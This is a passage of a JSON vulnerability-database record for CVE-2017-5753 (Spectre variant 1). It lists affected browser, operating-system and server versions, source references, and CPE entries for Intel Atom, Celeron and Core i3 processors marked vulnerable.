"trust": 0.3, "vendor": "google", "version": "15.0.866.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.34" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "52.0.2743.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1673.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.35" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.131" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.128" }, { "model": "enterprise linux server year extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-47.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.653.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1656.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "48.0.2564.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.713.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.643.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.228" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "53.0.2785.144" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.5" }, { "model": "bactec", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "9120/92400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.504.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.767.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1292.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1058.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "62.0.3202.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.129" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.21" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.218" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.68" }, { "model": "windows version for x64-based systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1016070" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.359.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.205" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.78" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.565.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.567.0" }, { "model": "ios", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "11.2.2" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.37586" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.238" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.656.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1011" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1033.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.788.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.691.0" } ], "sources": [ { "db": "CERT/CC", "id": "VU#180049" }, { "db": "CNVD", "id": "CNVD-2018-00304" }, { "db": "BID", "id": "102371" }, { "db": "NVD", "id": "CVE-2017-5753" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2308:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2316:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2338:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2350:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2358:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2508:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2516:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2518:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2538:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2550:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2558:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2718:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2730:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2738:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2750:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2758:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3308:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3338:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3508:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3538:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3558:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3708:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3750:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3758:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3808:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3830:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3850:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3858:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3950:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3955:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3958:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3805:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3815:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3825:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3826:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3827:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3845:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3130:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3200rk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3205rk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3230rk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3235rk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3265rk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3295rk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3405:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3445:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x5-e3930:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x5-e3940:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x7-e3950:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2420:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2460:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2480:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2520:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2560:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2580:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2760:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3460:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3480:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3560:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3570:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3580:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3590:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3736f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3736g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3740:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3740d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3745:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3745d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3770:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3770d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3775:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3775d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3785:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3795:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1750:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1800:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1850:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1900:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3060:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3160:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3355:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3455:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j4005:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j4105:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2805:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2806:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2807:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2808:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2810:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2815:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2820:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2830:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2840:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2910:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2920:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2930:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2940:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3000:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3010:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3050:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3060:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3150:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3160:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3350:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3450:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n4000:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n4100:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:330e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:330m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:330um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:350m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:370m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:380m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:380um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:390m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:540:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:550:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:560:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2100:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2100t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2102:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2105:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2115c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2120:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2120t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2125:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2130:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2310e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2310m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2312m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2328m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2330e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2330m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2340ue:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2348m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2350m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2357m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2365m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2367m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2370m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2375m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2377m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3110m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3115c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3120m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3120me:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3130m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3210:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3217u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3217ue:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3220:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3220t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3225:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3227u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3229y:*:*:*:*:*:*:*", "cpe_name": 